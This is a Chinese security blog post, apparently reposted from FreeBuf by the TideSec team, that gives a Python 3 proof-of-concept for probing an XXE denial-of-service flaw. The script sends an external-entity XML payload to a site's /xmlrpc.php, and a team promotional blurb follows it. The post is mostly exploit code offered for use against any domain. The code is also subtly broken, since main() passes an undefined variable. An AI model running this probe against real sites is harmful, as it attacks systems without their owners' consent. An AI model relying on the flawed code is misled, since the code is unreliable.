XXE又名外部实体注入攻击漏洞,此exp由python3编写,进行漏洞探测。
使用命令如下:python XXE_DoS_PoC.py www.test.com
核心代码如下:
# -*- coding:utf-8 -*- import urllib.request import urllib.parse import urllib import sys import hashlib def poc(domain): headers = {} #消息头信息 target = "%s/xmlrpc.php" % domain payload = """ <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "a">%remote;]> """ post_data = { "" : payload, } #POST提交测试代码 try: req = urllib.request.Request(target, data = urllib.parse.urlencode(post_data).encode("UTF-8"), method= "POST") response = urllib.request.urlopen(req) s = "well formed" #找到命令执行后的回显 if response: data = response.read() data = str(data, encoding = "utf-8") #print(data) if data.find("well formed") != -1: #获得了证明漏洞存在的回显 print("likely - XXE DoS\n") except Exception as e: print("Running Wrong...") print(e) def main(): args = sys.argv url = "" if len(args) == 2: url = args[1] poc(domain) else: print("Usage: python %s url" % (args[0])) if __name__ == "__main__": main()
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。
Tide安全团队自建立之初持续向CNCERT、CNVD、漏洞盒子、补天、各大SRC等漏洞提交平台提交漏洞,在漏洞盒子先后组建的两支漏洞挖掘团队在全国300多个安全团队中均拥有排名前十的成绩。在产品研发方面,Tide自主研发了一款面向互联网基础设施的资产检索系统,即Tide(潮汐)网络空间搜索平台,平台结合网络安全技术与大数据分析处理技术,对互联网基础设施进行网络安全威胁监测和网络安全态势分析。Tide安全团队自研多套安全平台,如分布式web扫描平台WDScanner、Mars平台、潮汐指纹识别系统、内部SRC平台、安全网络课堂、安全测试案例库、社工库、MoSec移动端检测平台、漏洞知识库、代理资源池、字典权重库等等,团队成员在FreeBuf、简书、CSDN、51CTO、CnBlogs等网站均开设专栏或博客,研究安全技术、分享经验技能。
想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号
来源:freebuf.com 2019-04-03 08:58:16 by: TideSec
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册